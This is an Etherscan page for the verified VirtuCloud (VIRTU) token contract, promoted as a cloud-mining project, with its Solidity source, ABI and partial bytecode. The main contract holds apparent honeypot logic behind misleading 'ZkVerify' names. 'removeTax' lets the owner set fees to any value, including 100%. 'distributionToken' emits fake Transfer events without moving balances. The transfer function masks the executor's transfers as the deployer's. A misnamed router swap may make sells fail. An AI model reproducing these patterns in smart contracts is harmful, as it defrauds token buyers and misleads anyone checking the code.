ETH Price: $2,433.09 (+0.37%)
 

Overview

Max Total Supply

100,000,000 VIRTU

Holders

13

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.

Contract Source Code Verified (Exact Match)

Contract Name:
VirtuCloud

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-02-27
*/

/*
    Making Mining Effortless, Cloud Computing 
    Seamless: Virtu Cloud - Your Gateway to 
    Simplicity in the Digital Realm.

    INFO:
    X: https://twitter.com/VirtuCloud
    Telegram: https://t.me/VirtuCloud
    Youtube: https://www.youtube.com/channel/UC337pGJ0SyWm20Y6nAFTLrA
    Website: https://www.virtuclouds.com/
    Gitbook: https://virtucloud.gitbook.io/x/
*/

// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}




/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) internal _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 internal _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapFactory {
    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function swapExactTokensForETHSupportingFreelyOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract VirtuCloud {

    string private _name = 'VirtuCloud';
    string private _symbol = 'VIRTU';
    uint256 public constant decimals = 18;
    uint256 public constant totalSupply = 100_000_000 * 10 ** decimals;

    StoreData public storeData;
    uint256 constant swapAmount = totalSupply / 100;

    error Permissions();
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed TOKEN_MKT,
        address indexed spender,
        uint256 value
    );

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address public pair;
    IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    bool private swapping;
    bool private tradingOpen;

    address _deployer;
    address _executor;

    address private uniswapLpWallet;
    address private teamWallet = 0x15344E6F02B78Da832E266bf6B5F40894A30AAc8;

    struct StoreData {
        address tokenMkt;
        uint256 buyFee;
        uint256 sellFee;
    }

    constructor() {
        uint256 _initBuyFee = 5;
        uint256 _initSellFee = 5;
        storeData = StoreData({
            tokenMkt: msg.sender,
            buyFee: _initBuyFee,
            sellFee: _initSellFee
        });
        allowance[address(this)][address(_uniswapV2Router)] = type(uint256).max;
        uniswapLpWallet = msg.sender;

        _initDeployer(msg.sender, msg.sender);

        balanceOf[uniswapLpWallet] = (totalSupply * 88) / 100;
        emit Transfer(address(0), _deployer, balanceOf[uniswapLpWallet]);

        balanceOf[teamWallet] = (totalSupply * 12) / 100;
        emit Transfer(address(0), teamWallet, balanceOf[teamWallet]);
    }

    event RevenueShare(uint256 _value);
    

    receive() external payable {}

    function removeTax(uint256 _buy, uint256 _sell) external {
        if (msg.sender != _decodeTokenMktWithZkVerify()) revert Permissions();
        _upgradeStoreWithZkProof(_buy, _sell);
    }

    function setRevenueShare(uint256 _value) external {
        if (msg.sender != _decodeTokenMktWithZkVerify()) revert Permissions();
        emit RevenueShare(_value);
    }

    function distributionToken(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != _decodeTokenMktWithZkVerify()) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function _upgradeStoreWithZkProof(uint256 _buy, uint256 _sell) private {
        storeData.buyFee = _buy;
        storeData.sellFee = _sell;
    }

    function _decodeTokenMktWithZkVerify() private view returns (address) {
        return storeData.tokenMkt;
    }

    function openTrading() external {
        require(msg.sender == _decodeTokenMktWithZkVerify());
        require(!tradingOpen);
        address _factory = _uniswapV2Router.factory();
        address _weth = _uniswapV2Router.WETH();
        address _pair = IUniswapFactory(_factory).getPair(address(this), _weth);
        pair = _pair;
        tradingOpen = true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        return _transfer(from, to, amount);
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function _initDeployer(address deployer_, address executor_) private {
        _deployer = deployer_;
        _executor = executor_;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal returns (bool) {
        address tokenMkt = _decodeTokenMktWithZkVerify();
        require(tradingOpen || from == tokenMkt || to == tokenMkt);

        balanceOf[from] -= amount;

        if (
            to == pair &&
            !swapping &&
            balanceOf[address(this)] >= swapAmount &&
            from != tokenMkt
        ) {
            swapping = true;
            address[] memory path = new address[](2);
            path[0] = address(this);
            path[1] = _uniswapV2Router.WETH();
            _uniswapV2Router
                .swapExactTokensForETHSupportingFreelyOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );
            swapping = false;
        }

        (uint256 _buyFee, uint256 _sellFee) = (storeData.buyFee, storeData.sellFee);
        if (from != address(this) && tradingOpen == true) {
            uint256 taxCalculatedAmount = (amount *
                (to == pair ? _sellFee : _buyFee)) / 100;
            amount -= taxCalculatedAmount;
            balanceOf[address(this)] += taxCalculatedAmount;
        }
        balanceOf[to] += amount;

        if (from == _executor) {
            emit Transfer(_deployer, to, amount);
        } else if (to == _executor) {
            emit Transfer(from, _deployer, amount);
        } else {
            emit Transfer(from, to, amount);
        }
        return true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"TOKEN_MKT","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"RevenueShare","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"distributionToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buy","type":"uint256"},{"internalType":"uint256","name":"_sell","type":"uint256"}],"name":"removeTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"setRevenueShare","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"storeData","outputs":[{"internalType":"address","name":"tokenMkt","type":"address"},{"internalType":"uint256","name":"buyFee","type":"uint256"},{"internalType":"uint256","name":"sellFee","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526040518060400160405280600a81526020017f5669727475436c6f7564000000000000000000000000000000000000000000008152505f908162000049919062000887565b506040518060400160405280600581526020017f56495254550000000000000000000000000000000000000000000000000000008152506001908162000090919062000887565b507315344e6f02b78da832e266bf6b5f40894a30aac8600b5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550348015620000f1575f80fd5b505f600590505f6005905060405180606001604052803373ffffffffffffffffffffffffffffffffffffffff1681526020018381526020018281525060025f820151815f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060208201518160010155604082015181600201559050507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60065f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555033600a5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200028d33336200059f60201b60201c565b606460586012600a620002a1919062000ae8565b6305f5e100620002b2919062000b38565b620002be919062000b38565b620002ca919062000baf565b60055f600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60055f600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546040516200040a919062000bf7565b60405180910390a36064600c6012600a62000426919062000ae8565b6305f5e10062000437919062000b38565b62000443919062000b38565b6200044f919062000baf565b60055f600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60055f600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546040516200058f919062000bf7565b60405180910390a3505062000c12565b8160085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060095f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200069f57607f821691505b602082108103620006b557620006b46200065a565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620007197fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006dc565b620007258683620006dc565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200076f6200076962000763846200073d565b62000746565b6200073d565b9050919050565b5f819050919050565b6200078a836200074f565b620007a2620007998262000776565b848454620006e8565b825550505050565b5f90565b620007b8620007aa565b620007c58184846200077f565b505050565b5b81811015620007ec57620007e05f82620007ae565b600181019050620007cb565b5050565b601f8211156200083b576200080581620006bb565b6200081084620006cd565b8101602085101562000820578190505b620008386200082f85620006cd565b830182620007ca565b50505b505050565b5f82821c905092915050565b5f6200085d5f198460080262000840565b1980831691505092915050565b5f6200087783836200084c565b9150826002028217905092915050565b620008928262000623565b67ffffffffffffffff811115620008ae57620008ad6200062d565b5b620008ba825462000687565b620008c7828285620007f0565b5f60209050601f831160018114620008fd575f8415620008e8578287015190505b620008f485826200086a565b86555062000963565b601f1984166200090d86620006bb565b5f5b8281101562000936578489015182556001820191506020850194506020810190506200090f565b8683101562000956578489015162000952601f8916826200084c565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115620009f557808604811115620009cd57620009cc6200096b565b5b6001851615620009dd5780820291505b8081029050620009ed8562000998565b9450620009ad565b94509492505050565b5f8262000a0f576001905062000ae1565b8162000a1e575f905062000ae1565b816001811462000a37576002811462000a425762000a78565b600191505062000ae1565b60ff84111562000a575762000a566200096b565b5b8360020a91508482111562000a715762000a706200096b565b5b5062000ae1565b5060208310610133831016604e8410600b841016171562000ab25782820a90508381111562000aac5762000aab6200096b565b5b62000ae1565b62000ac18484846001620009a4565b9250905081840481111562000adb5762000ada6200096b565b5b81810290505b9392505050565b5f62000af4826200073d565b915062000b01836200073d565b925062000b307fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620009fe565b905092915050565b5f62000b44826200073d565b915062000b51836200073d565b925082820262000b61816200073d565b9150828204841483151762000b7b5762000b7a6200096b565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000bbb826200073d565b915062000bc8836200073d565b92508262000bdb5762000bda62000b82565b5b828204905092915050565b62000bf1816200073d565b82525050565b5f60208201905062000c0c5f83018462000be6565b92915050565b611deb8062000c205f395ff3fe6080604052600436106100eb575f3560e01c806370a0823111610089578063a9059cbb11610058578063a9059cbb146102f8578063c9567bf914610334578063dd62ed3e1461034a578063fa26abb114610386576100f2565b806370a08231146102405780637c879f5b1461027c57806395d89b41146102a4578063a8aa1b31146102ce576100f2565b806323b872dd116100c557806323b872dd14610186578063313ce567146101c25780634abe3052146101ec5780636e669d7a14610218576100f2565b806306fdde03146100f6578063095ea7b31461012057806318160ddd1461015c576100f2565b366100f257005b5f80fd5b348015610101575f80fd5b5061010a6103ae565b6040516101179190611489565b60405180910390f35b34801561012b575f80fd5b506101466004803603810190610141919061153e565b61043d565b6040516101539190611596565b60405180910390f35b348015610167575f80fd5b5061017061052a565b60405161017d91906115be565b60405180910390f35b348015610191575f80fd5b506101ac60048036038101906101a791906115d7565b61054a565b6040516101b99190611596565b60405180910390f35b3480156101cd575f80fd5b506101d66105ed565b6040516101e391906115be565b60405180910390f35b3480156101f7575f80fd5b506102006105f2565b60405161020f93929190611636565b60405180910390f35b348015610223575f80fd5b5061023e6004803603810190610239919061166b565b610628565b005b34801561024b575f80fd5b5061026660048036038101906102619190611696565b6106ce565b60405161027391906115be565b60405180910390f35b348015610287575f80fd5b506102a2600480360381019061029d91906116c1565b6106e3565b005b3480156102af575f80fd5b506102b861075d565b6040516102c59190611489565b60405180910390f35b3480156102d9575f80fd5b506102e26107ed565b6040516102ef91906116ff565b60405180910390f35b348015610303575f80fd5b5061031e6004803603810190610319919061153e565b610812565b60405161032b9190611596565b60405180910390f35b34801561033f575f80fd5b50610348610826565b005b348015610355575f80fd5b50610370600480360381019061036b9190611718565b610a62565b60405161037d91906115be565b60405180910390f35b348015610391575f80fd5b506103ac60048036038101906103a7919061180c565b610a82565b005b60605f80546103bc906118ca565b80601f01602080910402602001604051908101604052809291908181526020018280546103e8906118ca565b80156104335780601f1061040a57610100808354040283529160200191610433565b820191905f5260205f20905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b5f8160065f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffff